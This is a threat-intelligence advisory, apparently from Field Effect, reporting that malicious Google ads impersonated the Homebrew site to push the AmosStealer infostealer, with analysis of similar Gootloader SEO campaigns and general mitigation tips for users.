Security Intelligence
Loading table of contents...
Unknown threat actors have been observed abusing Google ads to trick unsuspecting users into installing an infostealer capable of stealing credentials, browser data, and cryptocurrency wallets.
The ads target Google users who are looking for the official Homebrew website. This popular open-source package manager allows macOS and Linux users to install, update, and manage software from the command line. When a Google search is conducted for ‘Homebrew’, the first result displayed is a Google ad that appears to be for the official website of Homebrew, homebrew.sh. However, the ad redirects users to a fake website hombrewe.sh.
Stay on top of emerging threats.
Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.
This website looks just like Homebrew’s official site, which provides the user with a command that they can use to install Homebrew. However, if the user runs the command shown by the fake website, it downloads and executes AmosStealer. This potent malware is capable of targeting over 50 cryptocurrency extensions, desktop wallets, and other sensitive data stored in web browsers.
Fake Homebrew website displaying command to install AmosStealer
Google has since removed the fake ad in question. However, cybersecurity researchers are calling on Google, and other search engine ad providers, to more thoroughly vet ads before they are allowed to be posted.
Source: Bleeping Computer
Analysis
The manipulation of Search Engine Optimization (SEO) and search engine ads to deliver malware to unsuspecting users is extremely common. It seems that almost any subject a user can search for has been, or will eventually be, subject to a malicious ad. For example, a Gootloader campaign observed in November 2024 targeted users searching for oddly specific subjects such as California breakroom laws and whether Bengal cats are legal in Australia.
In May 2024, Field Effect observed a different Gootloader campaign that redirected users searching for a ‘letter of withdrawal from agreement’ template to a compromised website where users were instructed to download the template. Upon analysis, Field Effect determined that this file contained a malicious JavaScript that, when executed, installs the first stage of Gootloader malware.
The impersonation of Homebrew is ideal for threat actors because those searching for it are likely looking for the necessary command to install it. We expect this is also why the threat actor chose to display the command required to download and install AmosStealer the same way Homebrew displays the command for the legitimate executable.
Fortunately, Google removed the ad in question, effectively stopping this particular attack vector. However, until search engines improve their ad vetting process, threat actors will likely continue abusing this attack vector for other search subjects.
Mitigation
Field Effect MDR users are automatically alerted when threat-related activity related to infostealer malware is detected in their environments. These AROs should be reviewed via the Field Effect Portal as soon as possible.
To lessen the impact of the risk posed by the malicious manipulation of SEO and search engine ads, Field Effect encourages users to:
- Keep their browser up to date;
- Configure anti-virus solutions to automatically scan files downloaded by browsers;
- Avoid visiting suspicious websites and adhere to any security notifications displayed by the browser (e.g. expired website certificates, unsecure connection, etc.);
- Rely on official, reputable sources when downloading content such as templates and samples; and
- Scrutinize the actual URL of the ad intended to be followed by hovering over it before clicking it.
